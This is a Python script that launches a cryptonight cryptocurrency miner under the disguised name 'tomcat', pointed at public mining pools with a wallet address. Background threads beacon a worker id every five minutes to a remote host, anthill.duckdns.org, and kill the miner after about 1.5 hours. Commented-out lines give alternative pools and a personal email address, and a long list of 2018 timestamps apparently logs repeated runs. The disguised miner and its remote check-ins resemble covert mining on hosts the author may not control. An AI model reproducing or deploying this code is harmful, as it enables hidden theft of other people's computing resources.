import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:01.658889
#2018-02-17 17:16:05.553848
#2018-02-17 19:04:01.307375
#2018-02-17 20:51:02.179826
#2018-02-17 22:38:01.930851
#2018-02-18 00:21:07.279518
#2018-02-18 02:12:06.483473
#2018-02-18 03:59:04.941135
#2018-02-18 05:47:05.673075
#2018-02-18 07:39:06.344856
#2018-02-18 09:26:05.824331
#2018-02-18 11:12:07.546740
#2018-02-18 12:59:07.062306
#2018-02-18 14:47:01.246101
#2018-02-18 16:35:05.692423
#2018-02-18 18:24:06.250174
#2018-02-18 20:11:06.090047
#2018-02-18 21:57:05.111299
#2018-02-18 23:46:04.879101
#2018-02-19 01:32:01.674307
#2018-02-19 03:20:07.414675
#2018-02-19 05:05:06.762993
#2018-02-19 06:49:06.813896
#2018-02-19 08:39:07.914246
#2018-02-19 10:28:04.067111
#2018-02-19 12:16:01.748131
#2018-02-19 14:02:04.332524
#2018-02-19 15:52:02.138343
#2018-02-19 17:40:04.575145
#2018-02-19 19:29:07.429701
#2018-02-19 21:18:06.823544
#2018-02-19 23:03:08.429788
#2018-02-20 00:46:06.244886
#2018-02-20 02:36:06.476236
#2018-02-20 04:25:06.039579
#2018-02-20 06:11:02.184019
#2018-02-20 07:56:05.330887
#2018-02-20 09:41:08.504205
#2018-02-20 11:25:08.109042
#2018-02-20 13:11:07.813476
#2018-02-20 14:56:10.730016
#2018-02-20 16:42:06.378138
#2018-02-20 18:28:04.801256
#2018-02-20 20:19:05.730025
#2018-02-20 22:06:06.549236
#2018-02-20 23:46:01.482264
#2018-02-21 01:32:08.297770
#2018-02-21 03:19:05.785168
#2018-02-21 05:07:01.824729
#2018-02-21 06:55:01.461445
#2018-02-21 08:42:06.101481
#2018-02-21 10:29:01.712377
#2018-02-21 12:16:05.770053
#2018-02-21 14:04:07.792564
#2018-02-21 15:49:04.775615
#2018-02-21 17:41:04.531826
#2018-02-21 19:27:08.460729
#2018-02-21 21:17:04.452127
#2018-02-21 23:03:05.857201
#2018-02-22 00:52:05.549477
#2018-02-22 02:40:01.960310
#2018-02-22 04:26:07.083741
#2018-02-22 06:12:06.195517
#2018-02-22 07:56:06.074080
#2018-02-22 09:45:09.066621
#2018-02-22 11:30:05.085906
#2018-02-22 13:18:06.411101
#2018-02-22 15:07:07.169125
#2018-02-22 16:52:01.703255
#2018-02-22 18:41:08.323698
#2018-02-22 20:33:06.076686
#2018-02-22 22:18:07.818304
#2018-02-23 00:05:06.282880
#2018-02-23 01:52:07.697383
#2018-02-23 03:41:06.426179
#2018-02-23 05:26:06.072849
#2018-02-23 07:12:06.588035
#2018-02-23 09:17:05.194711
#2018-02-23 11:23:08.368838
#2018-02-23 13:14:01.742989
#2018-02-23 14:59:08.040319
#2018-02-23 16:48:07.212598
#2018-02-23 18:43:04.404616
#2018-02-23 20:31:06.022003
#2018-02-23 22:18:05.617059
#2018-02-24 00:03:06.056928
#2018-02-24 01:53:06.117781
#2018-02-24 03:44:05.373689
#2018-02-24 05:33:01.413088
#2018-02-24 07:18:07.496683
#2018-02-24 09:07:06.784631
#2018-02-24 10:41:05.861145
#2018-02-24 12:28:01.985704
#2018-02-24 14:20:03.069355
#2018-02-24 16:07:05.630377
#2018-02-24 17:59:07.025362
#2018-02-24 19:47:04.576398
#2018-02-24 21:33:05.455746
#2018-02-25 00:20:03.841923
#2018-02-25 03:28:01.509404
#2018-02-25 07:11:06.353872